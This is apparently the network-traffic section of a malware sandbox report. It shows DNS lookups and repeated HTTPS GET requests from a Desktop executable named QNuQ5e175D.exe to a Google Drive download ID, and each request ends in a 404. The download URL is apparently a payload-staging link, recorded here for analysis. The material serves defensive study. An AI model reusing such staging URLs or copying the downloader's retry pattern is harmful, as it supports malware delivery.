                                                        Jan 11, 2025 05:14:22.560170889 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.560205936 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.560261965 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.567557096 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:22.567595005 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:22.567682028 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:22.567903042 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:22.567914009 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.219281912 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.219388008 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.219903946 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.219916105 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.220082045 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.220087051 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642601967 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642673016 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642718077 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.642736912 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642748117 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.642749071 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642786026 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.643443108 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.643462896 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:33.663480043 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:33.663528919 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:33.663661003 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:33.664045095 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:33.664072037 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.299854994 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.300038099 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.300651073 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.300795078 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.305495024 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.305514097 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.305830002 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.305885077 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.306766987 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.347352028 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.691972971 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.692316055 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.692382097 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.692465067 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.692514896 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.692651033 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.692800999 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.699543953 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:34.699579000 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:34.699656963 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:34.699872017 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:34.699882984 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.350193024 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.350249052 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.350657940 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.350672960 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.350838900 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.350843906 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775747061 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775827885 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775849104 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.775871038 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775880098 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.775927067 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775928020 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.775974989 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.776525974 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.776542902 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:45.794132948 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:45.794178963 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:45.794234037 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:45.795047045 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:45.795057058 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.448991060 CET44350018142.250.184.206192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 05:13:08.244750977 CET | 56148 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 05:13:08.251501083 CET | 53 | 56148 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 05:13:09.551736116 CET | 54283 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 05:13:09.558438063 CET | 53 | 54283 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 05:13:08.244750977 CET | 192.168.2.4 | 1.1.1.1 | 0xaeb6 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:13:09.551736116 CET | 192.168.2.4 | 1.1.1.1 | 0xd852 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 05:13:08.251501083 CET | 1.1.1.1 | 192.168.2.4 | 0xaeb6 | No error (0) | drive.google.com | | 142.250.184.206 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:13:09.558438063 CET | 1.1.1.1 | 192.168.2.4 | 0xd852 | No error (0) | drive.usercontent.google.com | | 172.217.16.193 | A (IP address) | IN (0x0001) | false
                                                        • drive.google.com
                                                        • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 142.250.184.206 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:13:09 UTC | 216 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2025-01-11 04:13:09 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 11 Jan 2025 04:13:09 GMT
Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-rvWTHAlv7r-6beiO0_MOGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 172.217.16.193 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:13:10 UTC | 258 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2025-01-11 04:13:10 UTC | 2230 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFIdbgRRBVsFxWTiDXRQfidilVLR7Ia_EU_qZLAq0WddOUff271D59_toVqXUgkjvGuP1NvW-SLU7kM
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 11 Jan 2025 04:13:10 GMT
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-XNdeAJo4p6EC-YET1IzUqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
                                                        Server: UploadServer
                                                        Set-Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd; expires=Sun, 13-Jul-2025 04:13:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:13:10 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 45 4c 42 37 64 6b 30 6a 48 2d 6d 41 38 5a 68 4f 4d 72 58 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nELB7dk0jH-mA8ZhOMrXBA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:13:21 UTC | 422 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:21 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:21 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-oatrcb0GSwNumrv18nhU7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 172.217.16.193 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:13:22 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:22 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgRYzgcgZ9Wbmh56G03AjHcbsBtLw5tB8qfvxusdV58TJjo670Z-NCTllD9fVsmaV0t7aeLhmh4
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:22 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-RvEYxCsBG6gYbcFQNKwrrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:13:22 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 48 39 72 38 31 58 2d 79 43 67 77 6d 69 76 68 46 37 71 4a 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QH9r81X-yCgwmivhF7qJbw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:13:33 UTC | 422 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:33 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:33 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-slG8uyX4STG9O3vFRyG-nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 172.217.16.193 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:13:34 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:34 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgSAPf1LDa9mbRyVt3wFxVi_mf2ZhK4G77OC45KZGIFsfiCRYyQNUYjg44JKg5LjP0y2352r9Ks
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:34 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Irh2BwOx6FeYaELw0I71-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
